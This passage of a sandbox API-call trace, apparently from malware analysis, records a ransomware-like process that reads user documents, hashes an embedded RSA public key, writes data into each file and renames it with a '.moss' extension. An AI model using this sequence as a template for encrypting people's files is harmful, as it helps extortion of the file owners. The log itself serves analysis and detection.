lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.339] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.340] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x1317a, lpOverlapped=0x0) returned 1 [0172.340] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.340] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.340] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.340] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.340] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2eae0) returned 1 [0172.341] CryptCreateHash (in: hProv=0xd2eae0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.341] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.341] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.341] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.341] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.341] GetLastError () returned 0x0 [0172.342] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.342] CryptReleaseContext (hProv=0xd2eae0, dwFlags=0x0) returned 1 [0172.342] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.342] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.342] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.342] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.342] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.342] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.343] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x1317a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.343] WriteFile (in: hFile=0x664, lpBuffer=0x35ceae8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35ceae8*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.343] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\iENOEBYm.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\ienoebym.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\iENOEBYm.doc.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\ienoebym.doc.moss")) returned 1 [0172.345] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\Kui9_W1ugv074YE8w.pps") returned=".pps" [0172.345] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\Kui9_W1ugv074YE8w.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\kui9_w1ugv074ye8w.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.345] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=18728) returned 1 [0172.345] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.347] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x4902, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.347] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.348] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.348] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x4928, lpOverlapped=0x0) returned 1 [0172.348] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.348] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.348] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.348] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.348] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2eae0) returned 1 [0172.349] CryptCreateHash (in: hProv=0xd2eae0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.349] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.349] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.349] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.350] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.350] GetLastError () returned 0x0 [0172.350] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.350] CryptReleaseContext (hProv=0xd2eae0, dwFlags=0x0) returned 1 [0172.350] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.350] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.350] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.350] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.350] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.350] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.351] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x4928, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.351] WriteFile (in: hFile=0x664, lpBuffer=0x35ceae8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35ceae8*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.351] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\Kui9_W1ugv074YE8w.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\kui9_w1ugv074ye8w.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\Kui9_W1ugv074YE8w.pps.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\kui9_w1ugv074ye8w.pps.moss")) returned 1 [0172.352] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\OGaAnOzVb1N30G3.ppt") returned=".ppt" [0172.353] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\OGaAnOzVb1N30G3.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\ogaanozvb1n30g3.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.353] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=21076) returned 1 [0172.353] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.355] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x522e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.355] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.356] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.356] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x5254, lpOverlapped=0x0) returned 1 [0172.356] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.356] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.356] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.356] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.356] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2eae0) returned 1 [0172.357] CryptCreateHash (in: hProv=0xd2eae0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.357] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.357] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.358] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.358] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.358] GetLastError () returned 0x0 [0172.358] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.358] CryptReleaseContext (hProv=0xd2eae0, dwFlags=0x0) returned 1 [0172.358] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.358] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.358] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.358] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.358] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.358] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.359] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5254, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.359] WriteFile (in: hFile=0x664, lpBuffer=0x35ceae8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35ceae8*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.359] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\OGaAnOzVb1N30G3.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\ogaanozvb1n30g3.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\OGaAnOzVb1N30G3.ppt.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\ogaanozvb1n30g3.ppt.moss")) returned 1 [0172.361] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\Otj_8mdOmWLxIfCj.csv") returned=".csv" [0172.361] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\Otj_8mdOmWLxIfCj.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\otj_8mdomwlxifcj.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.361] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=80318) returned 1 [0172.361] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.363] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x13998, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.363] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.364] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.364] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x139be, lpOverlapped=0x0) returned 1 [0172.365] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.365] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.365] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.365] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.365] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2eae0) returned 1 [0172.366] CryptCreateHash (in: hProv=0xd2eae0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.366] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.366] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.366] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.366] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.366] GetLastError () returned 0x0 [0172.366] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.366] CryptReleaseContext (hProv=0xd2eae0, dwFlags=0x0) returned 1 [0172.366] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.366] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.366] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.366] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.367] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.367] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 